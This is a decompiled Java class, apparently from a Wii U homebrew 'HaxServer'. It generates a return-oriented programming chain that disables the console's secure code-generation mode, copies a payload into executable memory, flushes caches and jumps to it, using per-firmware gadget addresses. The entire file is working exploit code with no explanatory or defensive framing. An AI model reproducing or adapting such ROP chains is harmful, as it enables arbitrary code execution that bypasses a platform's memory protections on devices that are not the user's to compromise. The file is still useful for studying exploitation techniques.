/*     */ package com.gudenau.haxserver;
/*     */ 
/*     */ import java.io.ByteArrayOutputStream;
/*     */ import java.io.OutputStream;
/*     */ 
/*     */ public class RopChain
/*     */ {
/*     */   public static byte[] generate(int heapAddress, SystemVersions systemVersion, int sourceAddress)
/*     */     throws Exception
/*     */   {
/*  11 */     int payloadSize = 131072;
/*  12 */     int codegenAddress = 25165824;
/*     */     
/*  14 */     ByteArrayOutputStream out = new ByteArrayOutputStream();
/*     */     
/*  16 */     switchToCore1(systemVersion, out);
/*  17 */     copyCodebinToCodegen(codegenAddress, sourceAddress, payloadSize, systemVersion, out);
/*     */     
/*  19 */     popr24Tor31(
/*  20 */       systemVersion.getConstantInt("OSFatal"), 
/*  21 */       systemVersion.getConstantInt("Exit"), 
/*  22 */       systemVersion.getConstantInt("OSDynLoad_Acquire"), 
/*  23 */       systemVersion.getConstantInt("OSDynLoad_FindExport"), 
/*  24 */       systemVersion.getConstantInt("os_snprintf"), 
/*  25 */       sourceAddress, 
/*  26 */       8, 
/*  27 */       heapAddress, 
/*  28 */       systemVersion, 
/*  29 */       out);
/*     */     
/*     */ 
/*  32 */     Util.writeu32(codegenAddress, out);
/*  33 */     Util.writeu32(0, out);
/*  34 */     copyCodebinToCodegen(codegenAddress, sourceAddress, payloadSize, systemVersion, out);
/*     */     
/*  36 */     popr24Tor31(
/*  37 */       systemVersion.getConstantInt("OSFatal"), 
/*  38 */       systemVersion.getConstantInt("Exit"), 
/*  39 */       systemVersion.getConstantInt("OSDynLoad_Acquire"), 
/*  40 */       systemVersion.getConstantInt("OSDynLoad_FindExport"), 
/*  41 */       systemVersion.getConstantInt("os_snprintf"), 
/*  42 */       sourceAddress, 
/*  43 */       8, 
/*  44 */       heapAddress, 
/*  45 */       systemVersion, 
/*  46 */       out);
/*     */     
/*  48 */     Util.writeu32(codegenAddress, out);
/*     */     
/*  50 */     return out.toByteArray();
/*     */   }
/*     */   
/*     */   private static void copyCodebinToCodegen(int codegenAddress, int sourceAddress, int payloadSize, SystemVersions systemVersion, OutputStream out) throws Exception {
/*  54 */     OSSwitchSecCodeGenMode(0, systemVersion, out);
/*  55 */     memcpy(codegenAddress, sourceAddress, payloadSize, systemVersion, out);
/*  56 */     OSSwitchSecCodeGenMode(1, systemVersion, out);
/*  57 */     DCFlushRange(codegenAddress, payloadSize, systemVersion, out);
/*  58 */     ICInvalidateRange(codegenAddress, payloadSize, systemVersion, out);
/*     */   }
/*     */   
/*     */   private static void DCFlushRange(int address, int size, SystemVersions systemVersion, OutputStream out) throws Exception {
/*  62 */     callFunction(systemVersion, systemVersion.getConstantInt("DCFlushRange"), address, size, 0, 0, 0, out);
/*     */   }
/*     */   
/*     */   private static void ICInvalidateRange(int address, int size, SystemVersions systemVersion, OutputStream out) throws Exception {
/*  66 */     callFunction(systemVersion, systemVersion.getConstantInt("ICInvalidateRange"), address, size, 0, 0, 0, out);
/*     */   }
/*     */   
/*     */   private static void memcpy(int dest, int source, int size, SystemVersions systemVersion, OutputStream out) throws Exception {
/*  70 */     callFunction(systemVersion, systemVersion.getConstantInt("memcpy"), dest, source, size, 0, 0, out);
/*     */   }
/*     */   
/*     */   private static void OSSwitchSecCodeGenMode(int mode, SystemVersions systemVersion, OutputStream out) throws Exception {
/*  74 */     callFunction(systemVersion, systemVersion.getConstantInt("OSSwitchSecCodeGenMode"), mode, 0, 0, 0, 0, out);
/*     */   }
/*     */   
/*     */   private static void switchToCore1(SystemVersions systemVersion, OutputStream out) throws Exception {
/*  78 */     callFunction(systemVersion, systemVersion.getConstantInt("OSGetCurrentThread"), 0, 2, 0, 0, systemVersion.getConstantInt("OSSetThreadAffinity"), out);
/*     */     
/*  80 */     Util.writeu32(systemVersion.getConstantInt("CALLR28_POP_R28_TO_R31"), out);
/*  81 */     Util.writeu32(systemVersion.getConstantInt("OSYieldThread"), out);
/*  82 */     Util.writeu32(0, out);
/*  83 */     Util.writeu32(0, out);
/*  84 */     Util.writeu32(0, out);
/*  85 */     Util.writeu32(0, out);
/*  86 */     Util.writeu32(systemVersion.getConstantInt("CALLR28_POP_R28_TO_R31"), out);
/*  87 */     Util.writeu32(0, out);
/*  88 */     Util.writeu32(0, out);
/*  89 */     Util.writeu32(0, out);
/*  90 */     Util.writeu32(0, out);
/*  91 */     Util.writeu32(0, out);
/*     */   }
/*     */   
/*     */ 
/*     */   private static void callFunction(SystemVersions systemVersion, int function, int r3, int r4, int r5, int r6, int r28, OutputStream out)
/*     */     throws Exception
/*     */   {
/*  98 */     popr24Tor31(r6, r5, 0, systemVersion.getConstantInt("CALLR28_POP_R28_TO_R31"), function, r3, 0, r4, systemVersion, out);
/*  99 */     Util.writeu32(systemVersion.getConstantInt("CALLFUNC"), out);
/* 100 */     Util.writeu32(r28, out);
/* 101 */     Util.writeu32(0, out);
/* 102 */     Util.writeu32(0, out);
/* 103 */     Util.writeu32(0, out);
/* 104 */     Util.writeu32(0, out);
/*     */   }
/*     */   
/*     */   private static void popr24Tor31(int r24, int r25, int r26, int r27, int r28, int r29, int r30, int r31, SystemVersions systemVersion, OutputStream out) throws Exception {
/* 108 */     Util.writeu32(systemVersion.getConstantInt("POP_R24_TO_R31"), out);
/* 109 */     Util.writeu32(0, out);
/* 110 */     Util.writeu32(0, out);
/*     */     
/* 112 */     Util.writeu32(r24, out);
/* 113 */     Util.writeu32(r25, out);
/* 114 */     Util.writeu32(r26, out);
/* 115 */     Util.writeu32(r27, out);
/* 116 */     Util.writeu32(r28, out);
/* 117 */     Util.writeu32(r29, out);
/* 118 */     Util.writeu32(r30, out);
/* 119 */     Util.writeu32(r31, out);
/*     */     
/* 121 */     Util.writeu32(0, out);
/*     */   }
/*     */ }


/* Location:              D:\Stuff\WiiUHax\HaxServer.jar!\com\gudenau\haxserver\RopChain.class
 * Java compiler version: 8 (52.0)
 * JD-Core Version:       0.7.1
 */